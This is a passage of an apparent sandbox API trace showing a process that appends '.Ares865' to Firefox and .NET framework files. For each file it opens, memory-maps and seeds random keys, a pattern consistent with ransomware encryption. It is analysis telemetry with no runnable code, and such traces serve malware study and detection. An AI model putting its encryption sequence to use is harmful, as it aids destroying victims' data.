CreateFileMappingW (hFile=0x118, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x10b0, lpName=0x0) returned 0x120 [0054.840] MapViewOfFile (hFileMappingObject=0x120, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x10b0) returned 0x190000 [0054.841] CryptAcquireContextW (in: phProv=0x2e2d264, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2e2d264*=0x2f0380) returned 1 [0054.841] CryptGenRandom (in: hProv=0x2f0380, dwLen=0x80, pbBuffer=0x2e2d278 | out: pbBuffer=0x2e2d278) returned 1 [0054.841] CryptReleaseContext (hProv=0x2f0380, dwFlags=0x0) returned 1 [0054.842] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2d5f58 [0054.883] wsprintfW (in: param_1=0x2e2d5f8, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Reference Assemblies\\Microsoft\\Framework\\v3.0\\RedistList\\FrameworkList.xml.Ares865") returned 105 [0054.883] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Reference Assemblies\\Microsoft\\Framework\\v3.0\\RedistList\\FrameworkList.xml" (normalized: "c:\\program files (x86)\\reference assemblies\\microsoft\\framework\\v3.0\\redistlist\\frameworklist.xml"), lpNewFileName="C:\\Program Files (x86)\\Reference Assemblies\\Microsoft\\Framework\\v3.0\\RedistList\\FrameworkList.xml.Ares865" (normalized: "c:\\program files (x86)\\reference assemblies\\microsoft\\framework\\v3.0\\redistlist\\frameworklist.xml.ares865"), dwFlags=0x1) returned 1 [0054.883] CreateFileW (lpFileName="C:\\Program Files (x86)\\Reference Assemblies\\Microsoft\\Framework\\v3.0\\RedistList\\FrameworkList.xml.Ares865" (normalized: "c:\\program files (x86)\\reference assemblies\\microsoft\\framework\\v3.0\\redistlist\\frameworklist.xml.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x164 [0054.884] GetFileSizeEx (in: hFile=0x164, lpFileSize=0x2e2e4f0 | out: lpFileSize=0x2e2e4f0*=5682) returned 1 [0054.884] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x200300) returned 0x3240020 [0054.884] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2d3750 [0054.884] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x80) returned 0x2effc8 [0054.884] CryptAcquireContextW (in: phProv=0x2e2d2b4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2e2d2b4*=0x2f0380) returned 1 [0054.885] CryptGenRandom (in: hProv=0x2f0380, dwLen=0x80, pbBuffer=0x2e2d2c8 | out: pbBuffer=0x2e2d2c8) returned 1 [0054.885] CryptReleaseContext (hProv=0x2f0380, dwFlags=0x0) returned 1 [0054.885] CreateFileMappingW (hFile=0x164, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x1940, lpName=0x0) returned 0x120 [0054.886] MapViewOfFile (hFileMappingObject=0x120, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x1940) returned 0x190000 [0054.887] CryptAcquireContextW (in: phProv=0x2e2d264, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2e2d264*=0x2f0380) returned 1 [0054.888] CryptGenRandom (in: hProv=0x2f0380, dwLen=0x80, pbBuffer=0x2e2d278 | out: pbBuffer=0x2e2d278) returned 1 [0054.888] CryptReleaseContext (hProv=0x2f0380, dwFlags=0x0) returned 1 [0054.888] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2d5ee0 [0054.898] wsprintfW (in: param_1=0x2e2d5f8, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Mozilla Firefox\\precomplete.Ares865") returned 58 [0054.898] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Mozilla Firefox\\precomplete" (normalized: "c:\\program files (x86)\\mozilla firefox\\precomplete"), lpNewFileName="C:\\Program Files (x86)\\Mozilla Firefox\\precomplete.Ares865" (normalized: "c:\\program files (x86)\\mozilla firefox\\precomplete.ares865"), dwFlags=0x1) returned 1 [0054.899] CreateFileW (lpFileName="C:\\Program Files (x86)\\Mozilla Firefox\\precomplete.Ares865" (normalized: "c:\\program files (x86)\\mozilla firefox\\precomplete.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x164 [0054.899] GetFileSizeEx (in: hFile=0x164, lpFileSize=0x2e2e4f0 | out: lpFileSize=0x2e2e4f0*=2019) returned 1 [0054.899] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x200300) returned 0x3240020 [0054.900] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2d3750 [0054.900] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x80) returned 0x2effc8 [0054.900] CryptAcquireContextW (in: phProv=0x2e2d2b4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2e2d2b4*=0x2f0380) returned 1 [0054.900] CryptGenRandom (in: hProv=0x2f0380, dwLen=0x80, pbBuffer=0x2e2d2c8 | out: pbBuffer=0x2e2d2c8) returned 1 [0054.900] CryptReleaseContext (hProv=0x2f0380, dwFlags=0x0) returned 1 [0054.901] CreateFileMappingW (hFile=0x164, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0xaf0, lpName=0x0) returned 0x120 [0054.903] MapViewOfFile (hFileMappingObject=0x120, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0xaf0) returned 0x190000 [0054.903] CryptAcquireContextW (in: phProv=0x2e2d264, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2e2d264*=0x2f0380) returned 1 [0054.904] CryptGenRandom (in: hProv=0x2f0380, dwLen=0x80, pbBuffer=0x2e2d278 | out: pbBuffer=0x2e2d278) returned 1 [0054.904] CryptReleaseContext (hProv=0x2f0380, dwFlags=0x0) returned 1 [0054.904] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2d5ee0 [0054.931] wsprintfW (in: param_1=0x2e2d5f8, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Mozilla Firefox\\browser\\blocklist.xml.Ares865") returned 68 [0054.931] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Mozilla Firefox\\browser\\blocklist.xml" (normalized: "c:\\program files (x86)\\mozilla firefox\\browser\\blocklist.xml"), lpNewFileName="C:\\Program Files (x86)\\Mozilla Firefox\\browser\\blocklist.xml.Ares865" (normalized: "c:\\program files (x86)\\mozilla firefox\\browser\\blocklist.xml.ares865"), dwFlags=0x1) returned 1 [0054.932] CreateFileW (lpFileName="C:\\Program Files (x86)\\Mozilla Firefox\\browser\\blocklist.xml.Ares865" (normalized: "c:\\program files (x86)\\mozilla firefox\\browser\\blocklist.xml.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x164 [0054.932] GetFileSizeEx (in: hFile=0x164, lpFileSize=0x2e2e4f0 | out: lpFileSize=0x2e2e4f0*=83491) returned 1 [0054.932] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x200300) returned 0x3240020 [0054.932] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2c8f28 [0054.932] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x80) returned 0x2effc8 [0054.932] CryptAcquireContextW (in: phProv=0x2e2d2b4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2e2d2b4*=0x2f0380) returned 1 [0054.933] CryptGenRandom (in: hProv=0x2f0380, dwLen=0x80, pbBuffer=0x2e2d2c8 | out: pbBuffer=0x2e2d2c8) returned 1 [0054.933] CryptReleaseContext (hProv=0x2f0380, dwFlags=0x0) returned 1 [0054.933] CreateFileMappingW (hFile=0x164, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x14930, lpName=0x0) returned 0x120 [0054.935] MapViewOfFile (hFileMappingObject=0x120, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x14930) returned 0x190000 [0054.940] CryptAcquireContextW (in: phProv=0x2e2d264, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2e2d264*=0x2f0380) returned 1 [0054.941] CryptGenRandom (in: hProv=0x2f0380, dwLen=0x80, pbBuffer=0x2e2d278 | out: pbBuffer=0x2e2d278) returned 1 [0054.941] CryptReleaseContext (hProv=0x2f0380, dwFlags=0x0) returned 1 [0054.941] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2d3750 [0054.947] wsprintfW (in: param_1=0x2e2d5f8, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Mozilla Firefox\\browser\\searchplugins\\amazondotcom.xml.Ares865") returned 85 [0054.947] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Mozilla Firefox\\browser\\searchplugins\\amazondotcom.xml" (normalized: "c:\\program files (x86)\\mozilla firefox\\browser\\searchplugins\\amazondotcom.xml"), lpNewFileName="C:\\Program Files (x86)\\Mozilla Firefox\\browser\\searchplugins\\amazondotcom.xml.Ares865" (normalized: "c:\\program files (x86)\\mozilla firefox\\browser\\searchplugins\\amazondotcom.xml.ares865"), dwFlags=0x1) returned 1 [0054.956] CreateFileW (lpFileName="C:\\Program Files (x86)\\Mozilla Firefox\\browser\\searchplugins\\amazondotcom.xml.Ares865" (normalized: "c:\\program files (x86)\\mozilla firefox\\browser\\searchplugins\\amazondotcom.xml.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0054.956] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2e2e4f0 | out: lpFileSize=0x2e2e4f0*=2464) returned 1 [0054.956] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x200300) returned 0x3240020 [0054.956] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2c8f28 [0054.956] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x80) returned 0x2effc8 [0054.956] CryptAcquireContextW (in: phProv=0x2e2d2b4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2e2d2b4*=0x2f0380) returned 1 [0054.958] CryptGenRandom (in: hProv=0x2f0380, dwLen=0x80, pbBuffer=0x2e2d2c8 | out: pbBuffer=0x2e2d2c8) returned 1 [0054.958] CryptReleaseContext (hProv=0x2f0380, dwFlags=0x0) returned 1 [0054.958] CreateFileMappingW (hFile=0x118, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0xca0, lpName=0x0) returned 0x120 [0054.959] MapViewOfFile (hFileMappingObject=0x120, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0xca0) returned 0x190000 [0054.960] CryptAcquireContextW (in: phProv=0x2e2d264, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2e2d264*=0x2f0380) returned 1 [0054.961] CryptGenRandom (in: hProv=0x2f0380, dwLen=0x80, pbBuffer=0x2e2d278 | out: pbBuffer=0x2e2d278) returned 1 [0054.961] CryptReleaseContext (hProv=0x2f0380, dwFlags=0x0) returned 1 [0054.961] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2d3750 [0054.962] wsprintfW (in: param_1=0x2e2d5f8, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Mozilla Firefox\\browser\\searchplugins\\bing.xml.Ares865") returned 77 [0054.962] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Mozilla Firefox\\browser\\searchplugins\\bing.xml" (normalized: "c:\\program files (x86)\\mozilla firefox\\browser\\searchplugins\\bing.xml"), lpNewFileName="C:\\Program Files (x86)\\Mozilla Firefox\\browser\\searchplugins\\bing.xml.Ares865" (normalized: "c:\\program files (x86)\\mozilla firefox\\browser\\searchplugins\\bing.xml.ares865"), dwFlags=0x1) returned 1 [0054.962] CreateFileW (lpFileName="C:\\Program Files (x86)\\Mozilla Firefox\\browser\\searchplugins\\bing.xml.Ares865" (normalized: "c:\\program files (x86)\\mozilla firefox\\browser\\searchplugins\\bing.xml.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0054.962] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2e2e4f0 | out: lpFileSize=0x2e2e4f0*=2878) returned 1 [0054.962] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x200300) returned 0x3240020 [0054.963] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2c8f28 [0054.963] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x80) returned 0x2effc8 [0054.963] CryptAcquireContextW (in: phProv=0x2e2d2b4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2e2d2b4*=0x2f0380) returned 1 [0054.964] CryptGenRandom (in: hProv=0x2f0380, dwLen=0x80, pbBuffer=0x2e2d2c8 | out: pbBuffer=0x2e2d2c8) returned 1 [0054.964] CryptReleaseContext (hProv=0x2f0380, dwFlags=0x0) returned 1 [0054.964] CreateFileMappingW (hFile=0x118, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0xe40, lpName=0x0) returned 0x120 [0054.965] MapViewOfFile (hFileMappingObject=0x120, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0xe40) returned 0x190000 [0054.966] CryptAcquireContextW (in: phProv=0x2e2d264, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2e2d264*=0x2f0380) returned 1 [0054.967] CryptGenRandom (in: hProv=0x2f0380, dwLen=0x80, pbBuffer=0x2e2d278 | out: pbBuffer=0x2e2d278) returned 1 [0054.967] CryptReleaseContext (hProv=0x2f0380, dwFlags=0x0) returned 1 [0054.967] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2d3750 [0054.967] wsprintfW (in: param_1=0x2e2d5f8, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Mozilla Firefox\\browser\\searchplugins\\eBay.xml.Ares865") returned 77 [0054.967] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Mozilla Firefox\\browser\\searchplugins\\eBay.xml" (normalized: "c:\\program files (x86)\\mozilla firefox\\browser\\searchplugins\\ebay.xml"), lpNewFileName="C:\\Program Files (x86)\\Mozilla Firefox\\browser\\searchplugins\\eBay.xml.Ares865" (normalized: "c:\\program files (x86)\\mozilla firefox\\browser\\searchplugins\\ebay.xml.ares865"), dwFlags=0x1) returned 1 [0054.968] CreateFileW (lpFileName="C:\\Program Files (x86)\\Mozilla Firefox\\browser\\searchplugins\\eBay.xml.Ares865" (normalized: "c:\\program files (x86)\\mozilla firefox\\browser\\searchplugins\\ebay.xml.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0054.968] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2e2e4f0 | out: lpFileSize=0x2e2e4f0*=2583) returned 1 [0054.968] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x200300) returned 0x3240020 [0054.968] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2c8f28 [0054.969] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x80) returned 0x2effc8 [0054.969] CryptAcquireContextW (in: phProv=0x2e2d2b4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2e2d2b4*=0x2f0380) returned 1 [0054.969] CryptGenRandom (in: hProv=0x2f0380, dwLen=0x80, pbBuffer=0x2e2d2c8 | out: pbBuffer=0x2e2d2c8) returned 1 [0054.969] CryptReleaseContext (hProv=0x2f0380, dwFlags=0x0) returned 1 [0054.969] CreateFileMappingW (hFile=0x118, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0xd20, lpName=0x0) returned 0x120 [0054.971] MapViewOfFile (hFileMappingObject=0x120, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0xd20) returned 0x190000 [0054.971] CryptAcquireContextW (in: phProv=0x2e2d264, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2e2d264*=0x2f0380) returned 1 [0054.972] CryptGenRandom (in: hProv=0x2f0380, dwLen=0x80, pbBuffer=0x2e2d278 | out: pbBuffer=0x2e2d278) returned 1 [0054.972] CryptReleaseContext (hProv=0x2f0380, dwFlags=0x0) returned 1 [0054.972] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2d3750 [0054.973] wsprintfW (in: param_1=0x2e2d5f8, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Mozilla Firefox\\browser\\searchplugins\\google.xml.Ares865") returned 79 [0054.973] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Mozilla Firefox\\browser\\searchplugins\\google.xml" (normalized: "c:\\program files (x86)\\mozilla firefox\\browser\\searchplugins\\google.xml"), lpNewFileName="C:\\Program Files (x86)\\Mozilla Firefox\\browser\\searchplugins\\google.xml.Ares865" (normalized: "c:\\program files (x86)\\mozilla firefox\\browser\\searchplugins\\google.xml.ares865"), dwFlags=0x1) returned 1 [0054.974] CreateFileW (lpFileName="C:\\Program Files (x86)\\Mozilla Firefox\\browser\\searchplugins\\google.xml.Ares865" (normalized: "c:\\program files (x86)\\mozilla firefox\\browser\\searchplugins\\google.xml.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0054.974] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2e2e4f0 | out: lpFileSize=0x2e2e4f0*=2971) returned 1 [0054.974] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x200300) returned 0x3240020 [0054.974] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2c8f28 [0054.974] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x80) returned 0x2effc8 [0054.974] CryptAcquireContextW (in: phProv=0x2e2d2b4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2e2d2b4*=0x2f0380) returned 1 [0054.975] CryptGenRandom (in: hProv=0x2f0380, dwLen=0x80, pbBuffer=0x2e2d2c8 | out: pbBuffer=0x2e2d2c8) returned 1 [0054.975] CryptReleaseContext (hProv=0x2f0380, dwFlags=0x0) returned 1 [0054.975] CreateFileMappingW (hFile=0x118, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0xea0, lpName=0x0) returned 0x120 [0054.976] MapViewOfFile (hFileMappingObject=0x120, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0xea0) returned 0x190000 [0054.977] CryptAcquireContextW (in: phProv=0x2e2d264, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2e2d264*=0x2f0380) returned 1 [0054.978] CryptGenRandom (in: hProv=0x2f0380, dwLen=0x80, pbBuffer=0x2e2d278 | out: pbBuffer=0x2e2d278) returned 1 [0054.978] CryptReleaseContext (hProv=0x2f0380, dwFlags=0x0) returned 1 [0054.978] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2d3750 [0054.979] wsprintfW (in: param_1=0x2e2d5f8, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Mozilla Firefox\\browser\\searchplugins\\twitter.xml.Ares865") returned 80 [0054.979] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Mozilla Firefox\\browser\\searchplugins\\twitter.xml" (normalized: "c:\\program files (x86)\\mozilla firefox\\browser\\searchplugins\\twitter.xml"), lpNewFileName="C:\\Program Files (x86)\\Mozilla Firefox\\browser\\searchplugins\\twitter.xml.Ares865" (normalized: "c:\\program files (x86)\\mozilla firefox\\browser\\searchplugins\\twitter.xml.ares865"), dwFlags=0x1) returned 1 [0054.979] CreateFileW (lpFileName="C:\\Program Files (x86)\\Mozilla Firefox\\browser\\searchplugins\\twitter.xml.Ares865" (normalized: "c:\\program files (x86)\\mozilla firefox\\browser\\searchplugins\\twitter.xml.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0054.979] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2e2e4f0 | out: lpFileSize=0x2e2e4f0*=2961) returned 1 [0054.979] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x200300) returned 0x3240020 [0054.980] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2c8f28 [0054.980] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x80) returned 0x2effc8 [0054.980] CryptAcquireContextW (in: phProv=0x2e2d2b4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2e2d2b4*=0x2f0380) returned 1 [0054.980] CryptGenRandom (in: hProv=0x2f0380, dwLen=0x80, pbBuffer=0x2e2d2c8 | out: pbBuffer=0x2e2d2c8) returned 1 [0054.980] CryptReleaseContext (hProv=0x2f0380, dwFlags=0x0) returned 1 [0054.981] CreateFileMappingW (hFile=0x118, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0xea0, lpName=0x0) returned 0x120 [0054.982] MapViewOfFile (hFileMappingObject=0x120, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0xea0) returned 0x190000 [0054.983] CryptAcquireContextW (in: phProv=0x2e2d264, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2e2d264*=0x2f0380) returned 1 [0054.983] CryptGenRandom (in: hProv=0x2f0380, dwLen=0x80, pbBuffer=0x2e2d278 | out: pbBuffer=0x2e2d278) returned 1 [0054.983] CryptReleaseContext (hProv=0x2f0380, dwFlags=0x0) returned 1 [0054.984] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2d3750 [0054.984] wsprintfW (in: param_1=0x2e2d5f8, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Mozilla Firefox\\browser\\searchplugins\\wikipedia.xml.Ares865") returned 82 [0054.984] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Mozilla Firefox\\browser\\searchplugins\\wikipedia.xml" (normalized: "c:\\program files (x86)\\mozilla firefox\\browser\\searchplugins\\wikipedia.xml"), lpNewFileName="C:\\Program Files (x86)\\Mozilla Firefox\\browser\\searchplugins\\wikipedia.xml.Ares865" (normalized: "c:\\program files (x86)\\mozilla firefox\\browser\\searchplugins\\wikipedia.xml.ares865"), dwFlags=0x1) returned 1 [0054.985] CreateFileW (lpFileName="C:\\Program Files (x86)\\Mozilla Firefox\\browser\\searchplugins\\wikipedia.xml.Ares865" (normalized: "c:\\program files (x86)\\mozilla firefox\\browser\\searchplugins\\wikipedia.xml.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0054.985] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2e2e4f0 | out: lpFileSize=0x2e2e4f0*=2226) returned 1 [0054.986] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x200300) returned 0x3240020 [0054.986] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2c8f28 [0054.986] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x80) returned 0x2effc8 [0054.986] CryptAcquireContextW (in: phProv=0x2e2d2b4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2e2d2b4*=0x2f0380) returned 1 [0054.987] CryptGenRandom (in: hProv=0x2f0380, dwLen=0x80, pbBuffer=0x2e2d2c8 | out: pbBuffer=0x2e2d2c8) returned 1 [0054.987] CryptReleaseContext (hProv=0x2f0380, dwFlags=0x0) returned 1 [0054.987] CreateFileMappingW (hFile=0x118, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0xbc0, lpName=0x0) returned 0x120 [0054.988] MapViewOfFile (hFileMappingObject=0x120, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0xbc0) returned 0x190000 [0054.989] CryptAcquireContextW (in: phProv=0x2e2d264, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2e2d264*=0x2f0380) returned 1 [0054.990] CryptGenRandom (in: hProv=0x2f0380, dwLen=0x80, pbBuffer=0x2e2d278 | out: pbBuffer=0x2e2d278) returned 1 [0054.990] CryptReleaseContext (hProv=0x2f0380, dwFlags=0x0) returned 1 [0054.990] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2d3750 [0054.990] wsprintfW (in: param_1=0x2e2d5f8, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Mozilla Firefox\\browser\\searchplugins\\yahoo.xml.Ares865") returned 78 [0054.990] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Mozilla Firefox\\browser\\searchplugins\\yahoo.xml" (normalized: "c:\\program files (x86)\\mozilla firefox\\browser\\searchplugins\\yahoo.xml"), lpNewFileName="C:\\Program Files (x86)\\Mozilla Firefox\\browser\\searchplugins\\yahoo.xml.Ares865" (normalized: "c:\\program files (x86)\\mozilla firefox\\browser\\searchplugins\\yahoo.xml.ares865"), dwFlags=0x1) returned 1 [0054.991] CreateFileW (lpFileName="C:\\Program Files (x86)\\Mozilla Firefox\\browser\\searchplugins\\yahoo.xml.Ares865" (normalized: "c:\\program files (x86)\\mozilla firefox\\browser\\searchplugins\\yahoo.xml.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0054.991] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2e2e4f0 | out: lpFileSize=0x2e2e4f0*=2675) returned 1 [0054.991] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x200300) returned 0x3240020 [0054.991] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2c8f28 [0054.991] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x80) returned 0x2effc8 [0054.991] CryptAcquireContextW (in: phProv=0x2e2d2b4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2e2d2b4*=0x2f0380) returned 1 [0054.992] CryptGenRandom (in: hProv=0x2f0380, dwLen=0x80, pbBuffer=0x2e2d2c8 | out: pbBuffer=0x2e2d2c8) returned 1 [0054.992] CryptReleaseContext (hProv=0x2f0380, dwFlags=0x0) returned 1 [0054.992] CreateFileMappingW (hFile=0x118, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0xd80, lpName=0x0) returned 0x120 [0054.994] MapViewOfFile (hFileMappingObject=0x120, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, 